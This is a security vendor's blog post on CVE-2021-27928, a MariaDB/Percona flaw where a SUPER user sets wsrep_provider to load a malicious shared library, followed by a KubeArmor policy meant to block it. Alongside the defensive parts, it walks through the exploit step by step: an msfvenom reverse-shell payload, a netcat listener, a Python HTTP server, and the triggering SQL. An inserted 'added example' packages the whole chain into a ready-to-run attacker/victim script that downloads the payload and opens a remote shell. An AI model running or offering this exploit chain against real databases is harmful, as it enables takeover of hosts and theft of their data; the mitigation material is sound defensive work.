
Protecting Percona DB Server from CVE-2021-27928 – Accuknox

Feb 1, 2022

Reading Time: 3 minutes

Introduction

Data is a critical asset of any company, and protecting it is a critical part of protecting the business. A strong database security posture lets you protect your organization's sensitive information not only from outsiders but also from users who already hold privileged access.

Every database faces different threats. Here we look at an insider threat: a malicious user who already holds the SUPER privilege on a Percona Server (or MariaDB) instance turns it into remote code execution on the database host. We will first understand the vulnerability, then walk through the exploit itself, and finally see how to protect against it.

Vulnerability Assessment

So, let us understand the vulnerability. Remote code execution is the core issue. An untrusted search path leads to eval injection: a database SUPER user can execute OS commands after modifying the wsrep_provider and wsrep_notify_cmd variables. wsrep_provider names the Galera shared library that mysqld loads with dlopen() at runtime, and the server accepts whatever path a SUPER user supplies, so pointing it at an attacker-controlled .so runs that library's code inside the mysqld process with the server's privileges. To reproduce the exploit, install one of the affected versions listed below.

Prerequisites:

  1. MariaDB 10.2 before 10.2.37,
    Or 10.3 before 10.3.28,
    Or 10.4 before 10.4.18,
    Or 10.5 before 10.5.9
  2. Percona Server through 2021-03-03

An affected version is already installed on our test machine, as shown below (10.5.8 falls inside the "10.5 before 10.5.9" range). root@kali will be our victim machine.

root@kali:~# mysql -V
mysql  Ver 15.1 Distrib 10.5.8-MariaDB, for debian-linux-gnu (x86_64) using EditLine wrapper
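As an added example (not part of the original post), the following shell script encodes the affected MariaDB ranges listed above so that the version a server reports can be checked mechanically, and prints the two variables the exploit abuses together with the accounts that hold SUPER, the privilege needed to change them. It assumes a mysql client on the path; credentials and host are whatever you pass through to it. Percona Server builds have no version number in the list above, so they still have to be compared against the 2021-03-03 cut-off by hand.

```shell
#!/bin/sh
# Added example, not from the original post: check a MariaDB/Percona
# version string against the affected ranges listed under "Prerequisites"
# and dump the settings CVE-2021-27928 abuses. Assumes a mysql client.

# mariadb_version_vulnerable VERSION
#   VERSION is the string from `SELECT VERSION()` or `mysql -V`, e.g.
#   "10.5.8-MariaDB-1". Returns 0 (shell true) when it lies inside one of
#   the affected MariaDB ranges, 1 otherwise. Only the MariaDB ranges are
#   encoded; Percona builds must be checked against the 2021-03-03 date.
mariadb_version_vulnerable() {
    v=${1%%-*}                 # "10.5.8-MariaDB-1" -> "10.5.8"
    v=${v%%[!0-9.]*}           # keep only the leading digits and dots
    oldifs=$IFS
    IFS=.
    set -- $v                  # split on "." into major minor patch
    IFS=$oldifs
    major=${1:-0}; minor=${2:-0}; patch=${3:-0}
    [ "$major" -eq 10 ] 2>/dev/null || return 1
    case $minor in
        2) [ "$patch" -lt 37 ] ;;   # 10.2 before 10.2.37
        3) [ "$patch" -lt 28 ] ;;   # 10.3 before 10.3.28
        4) [ "$patch" -lt 18 ] ;;   # 10.4 before 10.4.18
        5) [ "$patch" -lt 9 ] ;;    # 10.5 before 10.5.9
        *) return 1 ;;
    esac
}

# wsrep_settings_audit [mysql options...]
#   Prints the variables the exploit modifies plus every account holding
#   SUPER. Extra arguments go to the mysql client (e.g. -u root -p -h 127.0.0.1).
#   A wsrep_provider outside the distribution's library directory, or any
#   wsrep_notify_cmd on a server that is not a Galera node, is suspicious.
wsrep_settings_audit() {
    mysql "$@" -e "SHOW GLOBAL VARIABLES WHERE Variable_name IN
                     ('version','wsrep_on','wsrep_provider','wsrep_notify_cmd');
                   SELECT User, Host FROM mysql.user WHERE Super_priv = 'Y';"
}

# Usage: sh cve-2021-27928-check.sh "$(mysql -N -e 'SELECT VERSION()')"
if [ $# -gt 0 ]; then
    if mariadb_version_vulnerable "$1"; then
        echo "$1: inside an affected range for CVE-2021-27928"
    else
        echo "$1: not inside the listed MariaDB ranges (check Percona builds by date)"
    fi
fi
```

Run the audit as `wsrep_settings_audit -u root -p -h 127.0.0.1` after sourcing the script; every account it lists as holding SUPER can trigger the exploit on an unpatched server.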

The Exploit?

We will run the attacker side from a second machine and then start the exploitation. host@h will be the attacker's machine; the victim must be able to reach it on the listener and HTTP ports used below.

Step 1:

Let's create our reverse shell payload with msfvenom. We use the linux/x64/shell_reverse_tcp payload, built as a shared object (-f elf-so) so that mysqld can load it through wsrep_provider.

[NOTE] Change LHOST to your IP address.

host@h:~# msfvenom -p linux/x64/shell_reverse_tcp LHOST=172.26.255.252 LPORT=8181 -f elf-so -o CVE-2021-27928.so


Step 2:

Now we will use Netcat to listen on the port we chose as LPORT, so the reverse shell has something to connect back to.

host@h:~# nc -lvp 8181
listening on [any] 8181 ...

Step 3:

Next we need to get the payload onto the victim machine. We serve it from the attacker machine with Python's built-in HTTP server, started in the directory that holds CVE-2021-27928.so.

host@h:~# python3 -m http.server 8000
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...

Step 4:

Now log in to the victim machine and download the payload from the attacker's HTTP server (port 8000) into /tmp/CVE-2021-27928.so, the path used in the next step. The exact command is only shown as a screenshot in the original post; any HTTP client such as wget or curl will do.

Step 5:

We will now trigger the payload. Connect to the database as a SUPER user (root here) and point wsrep_provider at the downloaded library:

root@kali:~# mysql -u root -p -h 127.0.0.1 -e 'SET GLOBAL wsrep_provider="/tmp/CVE-2021-27928.so";'
Enter password:
ERROR 2013 (HY000) at line

The error 2013 (lost connection to the server) is expected rather than a sign of failure: mysqld loads the library as soon as the variable is set, the payload's initialisation code connects back to the listener and execve()s /bin/sh inside the mysqld process, and the client's connection dies with it.

Now check our listener: it has received the connection, and we have a root shell on the victim.

The shell runs with whatever privileges mysqld has. It is root here because the test server runs as root; on a packaged install mysqld runs as the mysql user, and an attacker would then need a separate privilege escalation to reach root.
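The five steps above, collected into one script as an added example (not the post's own code). Values are taken from the post: attacker 172.26.255.252, listener port 8181, HTTP port 8000, payload path /tmp/CVE-2021-27928.so and the root account. The victim-side download (Step 4, only a screenshot in the post) is assumed to be a wget of the served file, and is_elf is an added sanity check: a failed or truncated download gives no shell, so the file is checked for the ELF magic before wsrep_provider is pointed at it.

```shell
#!/bin/sh
# Added example, not from the original post: the exploit chain as one
# script with an attacker half and a victim half. Defaults are the values
# used in the post; override them through the environment.

ATTACKER=${ATTACKER:-172.26.255.252}   # LHOST, the attacker machine
LPORT=${LPORT:-8181}                   # netcat listener port
HTTP_PORT=${HTTP_PORT:-8000}           # python3 -m http.server port
SO_NAME=CVE-2021-27928.so
SO_PATH=/tmp/$SO_NAME                  # where the victim stores the payload

# is_elf FILE: 0 if FILE starts with the ELF magic (7f 45 4c 46), else 1.
# Guards against handing mysqld an HTML error page or an empty file.
is_elf() {
    [ "$(head -c 4 "$1" 2>/dev/null | od -An -tx1 | tr -d ' \n')" = "7f454c46" ]
}

# wsrep_statement: the SQL that makes mysqld dlopen() the payload.
wsrep_statement() {
    printf "SET GLOBAL wsrep_provider='%s';" "$SO_PATH"
}

# Attacker machine (host@h): build the payload, serve it, wait for the shell.
attacker() {
    msfvenom -p linux/x64/shell_reverse_tcp LHOST="$ATTACKER" LPORT="$LPORT" \
        -f elf-so -o "$SO_NAME"
    python3 -m http.server "$HTTP_PORT" &   # serves the current directory
    nc -lvp "$LPORT"                         # blocks until mysqld connects back
}

# Victim machine (root@kali): fetch the payload and trigger the load.
# Needs an account with SUPER. The client reports ERROR 2013 because the
# payload execve()s /bin/sh inside the mysqld process, which drops every
# client connection; the shell arrives at the attacker's listener.
victim() {
    wget -q "http://$ATTACKER:$HTTP_PORT/$SO_NAME" -O "$SO_PATH"
    is_elf "$SO_PATH" || { echo "download is not an ELF object" >&2; return 1; }
    mysql -u root -p -h 127.0.0.1 -e "$(wsrep_statement)"
}

# Usage: sh cve-2021-27928.sh attacker   (on host@h)
#        sh cve-2021-27928.sh victim     (on root@kali)
case ${1:-} in
    attacker) attacker ;;
    victim)   victim ;;
esac
```

Start the attacker half first so the HTTP server and listener are up before the victim half downloads the file and issues the SET GLOBAL.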

Let us see how we can protect it using the KubeArmor security policy.

How to use KubeArmor on your VM

Below is a sample policy we are going to apply using KubeArmor. We also have sample policies for many other workloads, curated by security experts; see our other policy templates. In this text version the policy file itself survives only as a screenshot (KubeArmor policy, not reproduced); its purpose is to deny mysqld access to the shared object named in wsrep_provider so that the library can never be loaded.

Save the file as vm-cve-2021-27928.yaml. To apply a VM policy, run the following command on the host where KubeArmor is running:

root@kali:~# karmor vm policy add vm-cve-2021-27928.yaml
Success

Once the policy is applied, run Step 5 again and see what happens.

This time mysqld is denied access to the shared object named in wsrep_provider, so the library is never loaded, its initialisation code never runs, and the listener on the attacker machine receives no connection. The payload is stopped before it executes.

To see the denied access in KubeArmor's logs, run the following command in a terminal (the original post shows the output as a screenshot):

karmor log --json
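Because the policy applied above survives only as a screenshot, here is an added example of a KubeArmorHostPolicy (written for this edit, not the post's file) that produces the effect the post describes: it denies mysqld any file under /tmp/, where the payload is dropped, and, as defence in depth, denies mysqld executing a shell, which is what the reverse-shell payload does. It assumes mysqld's executable is /usr/sbin/mysqld and that the VM carries the node label kubernetes.io/hostname=kali; both are assumptions and must match your host (check the binary with readlink -f "$(command -v mysqld)", since some packages install it as mariadbd and the rule must name the resolved path).

```shell
#!/bin/sh
# Added example, not the policy from the post's screenshot: write a
# KubeArmorHostPolicy for this VM and apply it with karmor. Assumptions:
# mysqld runs from /usr/sbin/mysqld and the node label is
# kubernetes.io/hostname=kali; override MYSQLD and NODE if yours differ.

POLICY_FILE=${POLICY_FILE:-vm-cve-2021-27928.yaml}
MYSQLD=${MYSQLD:-/usr/sbin/mysqld}   # assumed; verify with readlink -f
NODE=${NODE:-kali}                    # assumed node label value

# write_policy FILE: emit the policy YAML to FILE.
write_policy() {
    cat > "$1" <<EOF
apiVersion: security.kubearmor.com/v1
kind: KubeArmorHostPolicy
metadata:
  name: hsp-cve-2021-27928
spec:
  severity: 8
  tags: ["CVE-2021-27928", "MariaDB", "wsrep_provider"]
  message: "mysqld tried to open a file under /tmp or to spawn a shell"
  nodeSelector:
    matchLabels:
      kubernetes.io/hostname: $NODE
  file:
    matchDirectories:
    # The exploit needs mysqld to open() the .so so dlopen() can map it;
    # denying every path under /tmp/ to mysqld fails that open().
    - dir: /tmp/
      recursive: true
      fromSource:
      - path: $MYSQLD
  process:
    matchPaths:
    # Defence in depth: the reverse-shell payload execve()s /bin/sh, which
    # mysqld never does legitimately. /bin/dash is listed because /bin/sh
    # is a symlink to it on Debian-family hosts.
    - path: /bin/sh
      fromSource:
      - path: $MYSQLD
    - path: /bin/dash
      fromSource:
      - path: $MYSQLD
    - path: /bin/bash
      fromSource:
      - path: $MYSQLD
  action: Block
EOF
}

# apply_policy FILE: hand the file to the KubeArmor instance on this VM.
apply_policy() {
    karmor vm policy add "$1"
}

# policy_blocks FILE PATH: 0 if PATH appears as a blocked dir/path in FILE.
# Cheap sanity check before applying, so a typo does not yield a no-op policy.
policy_blocks() {
    grep -Eq "^[[:space:]]*- (dir|path): $2\$" "$1"
}

# Usage: sh vm-policy.sh write   (only write the YAML)
#        sh vm-policy.sh apply   (write it and load it into KubeArmor)
case ${1:-} in
    write) write_policy "$POLICY_FILE" ;;
    apply) write_policy "$POLICY_FILE" && apply_policy "$POLICY_FILE" ;;
esac
```

After `sh vm-policy.sh apply`, repeat Step 5: the listener should stay silent, mysqld should keep running, and `karmor log --json` should report a Block event for the mysqld process. Tighten the file rule further only after confirming with the audit logs that mysqld does not legitimately use /tmp on your host (tmpdir defaults to /tmp on many installs, so a blanket deny can break temporary tables; point tmpdir elsewhere first if that is the case).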

Conclusion

In this blog we have seen how a single server variable that a privileged database user is allowed to change can be abused to gain a root shell on the host. There are many other exploits that work against outdated database versions, so the real fix is to keep your database on the latest patch release as soon as the vendor publishes it; for this CVE that means MariaDB 10.2.37, 10.3.28, 10.4.18 or 10.5.9 and later, or a Percona Server build dated after 2021-03-03.

KubeArmor is a cloud runtime security tool by AccuKnox. It does not patch the vulnerability, but it lets you block the behaviour such exploits depend on (here, mysqld loading code from an unexpected path) while the update is being rolled out. To learn more about AccuKnox and its products, check out the links below.

KubeArmor website: https://kubearmor.io/

KubeArmor GitHub: https://github.com/kubearmor/KubeArmor

KubeArmor Slack: Join Us


Now you can protect your workloads in minutes using AccuKnox: it protects Kubernetes and other cloud workloads using kernel-native primitives such as AppArmor, SELinux, and eBPF.

Let us know if you are seeking additional guidance in planning your cloud security program.
